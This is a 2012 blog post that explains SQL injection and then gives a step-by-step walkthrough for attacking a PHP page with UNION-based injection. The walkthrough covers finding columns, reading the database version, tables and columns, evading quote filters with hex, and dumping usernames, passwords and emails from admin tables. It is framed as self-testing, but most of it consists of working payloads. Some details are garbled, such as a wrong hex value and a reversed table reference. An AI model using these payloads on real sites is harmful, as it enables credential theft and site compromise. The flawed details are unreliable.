Wednesday, 6 June 2012

Hunt For SQL Injection

So what is this buzz word "SQL injection",most of the security experts use this word quite often,even media use it.SQL injection has been quite a bit star in news world when was hit by this more common and publicly known attack method.SQL injection exploitation technique has such a widespread occurrence that most of the website owners are completely aware of the scenario,but yet they fail to implement the required amount of preventive methods,that eventually leads to compromise of user data which include the credit card details and other user credential.Latest attack on SONY PlayStation and related network shows us that how common this flaw exists and even industry giants can fall prey for it if some negligence was shown by the developer.

One of the major factor that gave SQL injection such a wide publicity is that, the method itself is very simple and can be automated to a large extend by using various automated tools like HAVIJ,SQL POISON etc.And for this reason most of the novice users can do SQL injection using such a tool to get administrator credential and thereby gain illicit entry to admin panel.These rather novice user commonly know as script kiddies can wreak havoc if they have enough privilege,most of the mass defaces and website spam can be seen as a direct out come of this.

Now let me explain how to do SQL injection testing for your own website to see if you are really SQL injection proof,You don't want bad guys doing it for you right! so please follow the steps as explained bellow:

STEP 1:Got to a URL link that you suspect as an injection point.for example: index.php?id=1

insert a ' (apostrophe) between = and 1


then if you get a SQL error like "MySQL encountered an error blah blah" then you have a likely candidate for injection.

STEP 2: Now is the right time to choose ORDER BY statement to find the number of columns.So how this work:

index.php?id=1 order by 1--

("--" comments the rest of the query.)

The page would load correctly,now increase the number to 2 and so on until an SQL error is found.

index.php?id=1 order by 2--

No error

index.php?id=1 order by 3--

No error

index.php?id=1 order by 4--

SQL error

We have error so we now know that there are 3 columns next we need to find the database name.

STEP 3:We need to find the vulnerable column in the list before start injecting for this we use UNION SELECT statement.

index.php?id=1 UNION SELECT 1,2,3--

You will probably getting a number on the page like 1,2 or 3 let us assume that it is 3 so now onwards we will inject our SQL vectors at position 3.

STEP 4:Now we can find the version and type of database by using the following query

index.php?id=1 UNION SELECT 1,2,@@version--

This will give the type of backend database that you are running on like MySQL community version 5.1+ etc make sure database is 5 otherwise following steps will not work.

index.php?id=1 UNION SELECT 1,2,group_concat(database())--

Will give you the current database name let us assume "test" as our database.

STEP 5:Now let use fetch the table names

index.php?id=1 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--

this will give you a list of tables look for something like tbl_admin,jos_user,admin etc.

STEP 6:Now to fetch columns in the table we can use the following statements

index.php?id=1 UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name_here"--

most probably you will get error due to double quote restriction evade this by converting table name into its hex value and appending it with 0x

for example admin becomes 0x61646d696e1f may be used without quotes.

Now the list of column can be used we need to filter out only the useful columns like username password email etc.

STEP 7:Now its time to get value out of the table

index.php?id=1 UNION SELECT 1,2,group_concat(username,0x3a,password,0x3a,email) from table_name.database_name--

Now wonder what 0x3a is there it's actually hex value of:

Now we will have data of the form ben: xyz12: etc.

Thats it you are done.Happy penetration testing guys.

No comments:

Post a Comment